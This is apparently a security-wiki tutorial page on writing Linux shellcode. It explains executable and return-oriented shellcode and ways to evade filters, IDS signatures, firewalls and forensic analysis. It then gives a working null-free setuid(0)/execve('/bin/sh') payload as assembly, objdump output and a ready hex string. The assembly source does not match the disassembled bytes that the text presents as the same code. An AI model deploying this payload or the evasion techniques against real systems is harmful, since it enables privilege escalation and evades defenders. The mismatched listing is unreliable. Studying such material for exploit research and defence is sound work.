Shellcode, also known as bytecode, is machine code (binary represented in hexadecimal) which can be used for buffer overflow exploitation, and is usually represented to humans in assembly. Machine code can be used by a programmer to write any application from an assembly approach (as it is just as powerful as any other programming language), though unlike other languages it is usually (but not always) limited to a single operating system and instruction set architecture.
|Shellcode requires a basic understanding of bitwise math, linux assembly, and stack overflows|
Every programming language is eventually expressed in binary, either at compile-time or runtime. When writing a buffer overflow there are many potential obstructions from security infrastructures (such as DEP, ASLR, firewalls, or IDS and IPS appliances) to keep in mind, as many filter bypass and IDS evasion techniques may need to be utilized for successful exploitation past modern countermeasures.
This article assumes that the user has access to some form of Linux or Unix bash environment with the standard GNU core utilities installed. In some cases, stub examples can be tested or used using OllyDBG or IDA pro. Throughout the articles in this category are small snippets of code taken from the examples found in the appendix; alternatively, shellcode and associated object files in this article are also contained in shellcodecs.
Types of shellcode
Many different types of shellcode may be utilized depending on the target environment for the execution of the code. Different types of countermeasures at different levels of the OSI model require different techniques for successful exploitation of a given application's vulnerability.
Executable vs. Return-oriented
There are primarily two types of shellcode from a runtime perspective: executable shellcode and return-oriented shellcode. The type required for successful exploitation is dictated by the target environment's ability to execute a data stack. If properly targetted, return oriented shellcode should work regardless of the stack's ability to execute, while executable shellcode will work exclusively on executable stacks.
- Executable shellcode is typically translated from assembly written for its respective target Operating System. Most basic executable shellcodes, or traditional null-free shellcodes can be used on any vulnerable application (sans filters) with an executable stack.
- Return oriented shellcode utilizes return oriented programming in cases when the vulnerable buffer is non-executable. This is usually performed by constructing a call stack formatted in a similar fashion to that generated by an ordinary compiled application which then triggers the execution of executable shellcode. Because the call stack is treated as data, this bypasses the need for an executable stack during exploitation.
|Certain instruction set architectures, such as MIPS, are not vulnerable to return oriented programming or traditional stack overflows due to the fact that they do not store the return addresses to functions in the stack.|
Countermeasures and environmental hostility
While traditional binary shellcodes will normally work unincumbered for unsanitized, unpatched, or larger inputs, many target environments and applications may have a variety of limiting factors that serve as obstacles to the execution of traditional machine code. Most applications written in C or C++ will require that the machine code be null-free, which is why null-free shellcode is the traditional basic form of executable shellcode programming.
- Character filters can be evaded by utilizing polymorphic (self-modifying code) to reconstruct bytecode outside of the allowed character set during runtime. Most character filters restrict characters to the printable keyspace, and so ascii shellcode and alphanumeric shellcode have become prevalent means of circumventing them.
- Character encoding can be bypassed by encoding the payload so that it will decode to the proper hexadecimal machine code. It is often that code will have to survive unicode, base64, case conversions, or other decoding before being copied into the vulnerable buffer.
- Buffer size may be incredibly limited and can require second-order-injection in circumstances which the payload is too large to fit into the vulnerable buffer. As a result, a shellcode's size is traditionally kept to a minimum for optimal re-usability.
- Firewalls can obstruct remote shellcodes by preventing new outbound connections from being formed or preventing new listening sockets from receiving traffic. Bypassing firewalls has been accomplished by utilizing file-descriptor re-use.
- Analysts may be debugging the vulnerable application in attempt to reverse engineer the exploitation process, int3 breakpoint detection and one-way hashing are demonstrated to evade volatile forensic analysis tools (such as volatility) .
- Signatures usually get in the way with Linux shellcode particularly due to the fact that syscalls are traditionally used to interface with the C calling convention, thus the most static part of any given shellcode with a C interface. Even polymorphic codes and self-modifying shellcodes usually unpack into shellcodes containing syscalls. Syscalls can be removed using self-linking code.
Shellcode is usually written first in assembly language. While it is possible for one to memorize an opcode table and write direct machine code by hand, this is not usually suitable for beginners and therefore is not recommended.
Assembling the code
Create a text file named test_shellcode.s.
This example will use hatter's null-free 32-byte payload for setuid(0); execve('/bin/sh',null,null). Copy the following code into test_shellcode.s, then save it:
# 32 bytes .text .globl _start _start: xor %rdi,%rdi pushq $0x69 pop %rax syscall push %rdi push %rdi pop %rsi pop %rdx pushq $0x68 movabs $0x7361622f6e69622f,%rax push %rax push %rsp pop %rdi pushq $0x3b pop %rax syscall
When creating shellcode on a Linux platform, the source file can be assembled using the GNU assembler:
|localhost:~ $ as test_shellcode.s -o test_shellcode.o|
Extracting the shellcode
|localhost:~ $ objdump -d test_shellcode.o|
The middle column contains the byte instructions corresponding to the assembly on that line. Most debuggers also show a hexadecimal representation corresponding with the assembly of the debugged application, in this case:
[email protected]:~$ objdump -d test_shellcode.o
test_shellcode.o: file format elf64-x86-64
0: 48 31 ff xor %rdi,%rdi 3: 6a 69 pushq $0x69 5: 58 pop %rax 6: 0f 05 syscall 8: 57 push %rdi 9: 57 push %rdi a: 5e pop %rsi b: 5a pop %rdx c: 48 bf 6a 2f 62 69 6e movabs $0x68732f6e69622f6a,%rdi 13: 2f 73 68 16: 48 c1 ef 08 shr $0x8,%rdi 1a: 57 push %rdi 1b: 54 push %rsp 1c: 5f pop %rdi 1d: 6a 3b pushq $0x3b 1f: 58 pop %rax 20: 0f 05 syscall
Many times you may come across shellcode in the wild, for example when analyzing malware or the newest exploit. You may want to disassemble the shellcode to learn what it does, the easiest way to do this is with objdump. In this example we'll use the example code which we just constructed, the shortest 64-bit setuid() shell online:
╭─[email protected] ~ ╰─➤ echo -en "\x48\x31\xff\x6a\x69\x58\x0f\x05\x57\x57\x5e\x5a\x48\xbf\x6a\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08\x57\x54\x5f\x6a\x3b\x58\x0f\x05" > shellcode; objdump -b binary -m i386 -M x86-64 -D shellcode shellcode: file format binary Disassembly of section .data: 00000000 <.data>: 0: 48 31 ff xor %rdi,%rdi 3: 6a 69 pushq $0x69 5: 58 pop %rax 6: 0f 05 syscall 8: 57 push %rdi 9: 57 push %rdi a: 5e pop %rsi b: 5a pop %rdx c: 48 bf 6a 2f 62 69 6e movabs $0x68732f6e69622f6a,%rdi 13: 2f 73 68 16: 48 c1 ef 08 shr $0x8,%rdi 1a: 57 push %rdi 1b: 54 push %rsp 1c: 5f pop %rdi 1d: 6a 3b pushq $0x3b 1f: 58 pop %rax 20: 0f 05 syscall ╭─[email protected] ~ ╰─➤
Pages in category "Shellcode"
The following 40 pages are in this category, out of 40 total.